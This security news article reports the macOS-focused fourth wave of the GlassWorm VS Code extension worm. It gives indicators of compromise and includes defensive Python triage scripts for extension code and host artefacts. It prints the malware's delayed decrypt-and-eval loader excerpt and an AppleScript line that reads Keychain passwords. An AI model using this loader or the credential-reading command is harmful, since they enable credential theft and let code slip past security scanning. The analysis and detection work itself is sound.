A fresh onset of GlassWorm malware has surfaced, representing a notable change in targeting approach from Windows to macOS platforms. This self-replicating worm, disseminated via harmful VS Code extensions on the Open VSX marketplace, has already amassed more than 50,000 downloads.

The fourth wave brings several alarming changes, including encrypted payloads, the ability to trojanize hardware wallet applications, and sandbox evasion techniques that let it slip past conventional security scanning tools.

The threat actor behind GlassWorm has demonstrated considerable flexibility, adapting through four unique phases since October. Earlier campaigns utilized invisible Unicode characters and compiled Rust binaries to obfuscate malicious code.

The most recent version discards these tactics in favor of AES-256-CBC encrypted JavaScript payloads specifically crafted for macOS settings.

Prettier Pro on open-vsx (Source - Koi)

Three questionable extensions were detected on the Open VSX marketplace: pro-svelte-extension, vsce-prettier-pro, and full-access-catppuccin-pro-extension, all linked through common infrastructure and encryption keys.

The malware utilizes a Solana-based command and control system that renders takedown attempts almost futile.

By posting transaction memos containing base64-encoded URLs to the blockchain, the attacker keeps decentralized control that cannot be disrupted through traditional domain blocking methods.

Investigators traced the infrastructure to IP address 45.32.151.157, previously utilized in the third wave, confirming the continuity of the threat actor.

Koi analysts uncovered the malware through behavioral analysis after their risk detection engine observed abnormal patterns in extension behavior and network activity.

Encrypted Payload and Sandbox Evasion Strategies

The fourth wave introduces an ingenious timing mechanism designed to elude automated security evaluations. Upon installation, the harmful extension waits precisely 15 minutes prior to executing its payload.

This delay matters because most sandbox environments time out within 5 minutes, so the extension looks entirely harmless for the whole of an automated scan.

The code uses a hardcoded delay of 9e5 milliseconds (900,000 ms, or 15 minutes); when the timer fires, it decrypts and executes the AES-256-CBC encrypted payload.

```javascript
// Loader excerpt quoted by Koi: after 9e5 ms (15 minutes, past typical
// sandbox timeouts) the embedded blob is decrypted with the hardcoded
// key/IV and the plaintext JavaScript is executed.
setTimeout(() => {
  const decrypted = crypto.createDecipheriv('aes-256-cbc', key, iv);
  let payload = decrypted.update(encryptedData, 'base64', 'utf8');
  payload += decrypted.final('utf8');
  eval(payload);
}, 9e5);
```
Encrypted payload execution (Source - Koi)

The payload itself is integrated at line 64 of the main extension file, encrypted with a hardcoded key and initialization vector that remains uniform across all three harmful extensions.

This consolidated cryptographic framework confirms a single threat actor is accountable for the campaign.
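The loader shape described above (a timer long enough to outlast a sandbox, an AES-256-CBC decrypt, and the plaintext handed to eval) is easy to spot statically if the scanner understands JavaScript numeric literals such as 9e5. The following triage heuristic is an added example for this article, not code from Koi's report or from any of the extensions; the 5-minute threshold comes from the article, while the regex names, the helper functions and the two sample extension sources (with zeroed placeholder key, IV and ciphertext) are constructed here.

```python
"""Static triage of VS Code extension JavaScript for the wave-4 loader
pattern: a setTimeout delay that outlasts a sandbox, an AES-256-CBC
decrypt, and eval() of the result. Heuristic, not a full parser."""
import re
from pathlib import Path

SANDBOX_TIMEOUT_MS = 5 * 60 * 1000  # article: most sandboxes give up within 5 min

SET_TIMEOUT_RE = re.compile(r"\bsetTimeout\s*\(")
DECIPHER_RE = re.compile(r"createDecipheriv\s*\(\s*[\'\"]aes-256-cbc[\'\"]")
DYNAMIC_EVAL_RE = re.compile(r"\beval\s*\(|new\s+Function\s*\(")


def _matching_paren(src, start):
    """Index of the ')' closing the '(' just before `start`, or -1.
    Parentheses inside string literals are not special-cased (heuristic)."""
    depth = 1
    for i in range(start, len(src)):
        if src[i] == "(":
            depth += 1
        elif src[i] == ")":
            depth -= 1
            if depth == 0:
                return i
    return -1


def _split_top_level_args(text):
    """Split an argument list on commas not nested inside (), [] or {}."""
    args, depth, cur = [], 0, []
    for ch in text:
        if ch in "([{":
            depth += 1
        elif ch in ")]}":
            depth -= 1
        if ch == "," and depth == 0:
            args.append("".join(cur))
            cur = []
        else:
            cur.append(ch)
    if cur:
        args.append("".join(cur))
    return args


def parse_js_number(literal):
    """Parse a JS numeric literal (900000, 900_000, 9e5, 0xDBBA0); None otherwise."""
    text = literal.strip().replace("_", "")
    for conv in (lambda s: int(s, 0), float):
        try:
            return conv(text)
        except ValueError:
            continue
    return None


def timer_delays_ms(src):
    """Every literal delay passed as the second argument of setTimeout()."""
    delays = []
    for m in SET_TIMEOUT_RE.finditer(src):
        end = _matching_paren(src, m.end())
        if end < 0:
            continue
        args = _split_top_level_args(src[m.end():end])
        if len(args) >= 2:
            ms = parse_js_number(args[1])
            if ms is not None:
                delays.append(ms)
    return delays


def triage_source(src):
    """Score one JavaScript source; eval of a decrypted blob is the loader
    signature, and a long timer in front of it is the sandbox evasion."""
    long_delays = [d for d in timer_delays_ms(src) if d >= SANDBOX_TIMEOUT_MS]
    report = {
        "long_timer_delays_ms": long_delays,
        "aes_cbc_decrypt": bool(DECIPHER_RE.search(src)),
        "dynamic_code_exec": bool(DYNAMIC_EVAL_RE.search(src)),
    }
    if report["dynamic_code_exec"] and (report["aes_cbc_decrypt"] or long_delays):
        report["verdict"] = "suspicious"
    elif report["dynamic_code_exec"] or long_delays:
        report["verdict"] = "review"
    else:
        report["verdict"] = "clean"
    return report


def triage_extension_dir(ext_dir):
    """Run triage_source over every .js file of an installed extension."""
    return {str(p.relative_to(ext_dir)): triage_source(p.read_text(errors="replace"))
            for p in Path(ext_dir).rglob("*.js")}


# Constructed sample mirroring the quoted loader shape; key, IV and ciphertext
# are zero placeholders, not values taken from the real extensions.
SAMPLE_LOADER = r"""
const crypto = require('crypto');
const key = Buffer.alloc(32), iv = Buffer.alloc(16), encryptedData = 'AAAA';
setTimeout(() => {
  const decrypted = crypto.createDecipheriv('aes-256-cbc', key, iv);
  let payload = decrypted.update(encryptedData, 'base64', 'utf8');
  payload += decrypted.final('utf8');
  eval(payload);
}, 9e5);
"""
# Constructed benign sample: short UI timer, no decryption, no eval.
SAMPLE_BENIGN = """
setTimeout(() => statusBar.hide(), 2000);
const out = prettier.format(text, { parser: 'babel' });
"""

if __name__ == "__main__":
    for name, src in (("loader", SAMPLE_LOADER), ("benign", SAMPLE_BENIGN)):
        print(name, triage_source(src))
```

Point `triage_extension_dir` at a directory under your editor's extensions folder to sweep every bundled script; a "review" verdict on a long timer alone is common in legitimate extensions, so the combination with decryption or eval is what should drive escalation.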

Once the delay period concludes, the malware retrieves the current command-and-control endpoint from the Solana blockchain and carries out any instructions it acquires.

The macOS-specific payload incorporates AppleScript for stealthy execution, LaunchAgents for persistence instead of Windows Registry keys, and direct access to the macOS Keychain database to recover saved passwords and credentials.

```applescript
set keychainPassword to do shell script "security find-generic-password -s 'password_service' -w"
```

The malware also possesses the ability to replace hardware wallet applications with trojanized versions, specifically targeting both Ledger Live and Trezor Suite.

Although the wallet replacement feature was not fully operational during evaluations on December 29, 2025, the code infrastructure is complete and poised for payload uploads.

Before installing a downloaded file, the malware checks that it exceeds 1000 bytes, avoiding broken installations that could alert victims.

All pilfered data is staged in the temporary directory /tmp/ijewf/, compressed, and dispatched to the exfiltration server at 45.32.150.251/p2p for attacker retrieval.
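The host-side indicators named in this article (the /tmp/ijewf/ staging directory, LaunchAgent persistence, the three extension names and the wallet applications at risk of replacement) can be checked on a live Mac or a mounted image in a few lines. The sweep below is an added example written for this article, not Koi's tooling; the extension install roots, the wallet bundle names, the set of trusted LaunchAgent program prefixes and the constructed demo host are assumptions, and only the staging path, extension names and wallet product names come from the article.

```python
"""Sweep a macOS volume for the indicators the article names: loot staged
under /tmp/ijewf/, LaunchAgent persistence, the three extension names and
the integrity of the Ledger Live / Trezor Suite bundles. `root` and `home`
are parameters so the same checks run against a mounted disk image."""
import plistlib
import shutil
import subprocess
import tempfile
from pathlib import Path

STAGING_DIR = "tmp/ijewf"                         # /tmp/ijewf/ from the article
EXTENSION_NAMES = ("pro-svelte-extension", "vsce-prettier-pro",
                   "full-access-catppuccin-pro-extension")
EXTENSION_ROOTS = (".vscode/extensions", ".vscode-oss/extensions",
                   ".vscodium/extensions")        # assumed install locations
WALLET_APPS = ("Ledger Live.app", "Trezor Suite.app")   # assumed bundle names
# Heuristic: an agent whose program lives outside these trees deserves review.
TRUSTED_PREFIXES = ("/System/", "/usr/", "/bin/", "/sbin/", "/Applications/")


def find_staging_dir(root):
    p = Path(root) / STAGING_DIR
    return str(p) if p.is_dir() else None


def find_known_extensions(home):
    """Installed extension folders whose name contains one of the three IDs."""
    hits = []
    for rel in EXTENSION_ROOTS:
        base = Path(home) / rel
        if base.is_dir():
            hits += [str(d) for d in base.iterdir()
                     if any(name in d.name for name in EXTENSION_NAMES)]
    return sorted(hits)


def launch_agent_reason(plist):
    """Why a parsed LaunchAgent plist is worth a look, or None."""
    args = [str(a) for a in plist.get("ProgramArguments") or []]
    program = plist.get("Program") or (args[0] if args else "")
    if program and not program.startswith(TRUSTED_PREFIXES):
        return f"program outside system/application trees: {program}"
    joined = " ".join(args)
    if "/tmp/" in joined:
        return "launches something out of /tmp"
    if "osascript" in joined:
        return "runs AppleScript via osascript"
    return None


def find_suspicious_launch_agents(home):
    hits = []
    for plist_path in (Path(home) / "Library/LaunchAgents").glob("*.plist"):
        try:
            with plist_path.open("rb") as fh:
                reason = launch_agent_reason(plistlib.load(fh))
        except Exception as exc:           # malformed plist is itself notable
            reason = f"unparseable plist: {exc}"
        if reason:
            hits.append((str(plist_path), reason))
    return sorted(hits)


def wallet_signature_status(root):
    """codesign verdict per wallet bundle; None when codesign is unavailable."""
    if shutil.which("codesign") is None:
        return None
    status = {}
    for app in WALLET_APPS:
        bundle = Path(root) / "Applications" / app
        if bundle.is_dir():
            r = subprocess.run(["codesign", "--verify", "--deep", "--strict", str(bundle)],
                               capture_output=True, text=True)
            status[app] = "valid" if r.returncode == 0 else f"FAILED: {r.stderr.strip()}"
    return status


def triage_host(root="/", home=str(Path.home())):
    return {
        "staging_dir": find_staging_dir(root),
        "known_extensions": find_known_extensions(home),
        "launch_agents": find_suspicious_launch_agents(home),
        "wallet_signatures": wallet_signature_status(root),
    }


def demo_on_constructed_host():
    """Build a throwaway volume showing each indicator and triage it."""
    with tempfile.TemporaryDirectory() as tmp:
        root, home = Path(tmp) / "root", Path(tmp) / "home"
        (root / STAGING_DIR).mkdir(parents=True)
        (home / ".vscode/extensions/example-publisher.vsce-prettier-pro-1.0.0").mkdir(parents=True)
        agents = home / "Library/LaunchAgents"
        agents.mkdir(parents=True)
        with (agents / "com.example.updater.plist").open("wb") as fh:   # constructed
            plistlib.dump({"Label": "com.example.updater", "RunAtLoad": True,
                           "ProgramArguments": ["/bin/sh", "/tmp/ijewf/run.sh"]}, fh)
        with (agents / "com.example.ok.plist").open("wb") as fh:        # constructed, benign
            plistlib.dump({"Label": "com.example.ok",
                           "ProgramArguments": ["/Applications/Ok.app/Contents/MacOS/ok"]}, fh)
        return triage_host(str(root), str(home))


if __name__ == "__main__":
    print(demo_on_constructed_host())
```

Running `triage_host()` with its defaults inspects the live system; for a forensic image, pass the mount point as `root` and the user's home on that volume as `home`. The codesign check only runs where the tool exists, so on a non-Mac analysis box the wallet entry is reported as unavailable rather than as clean.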
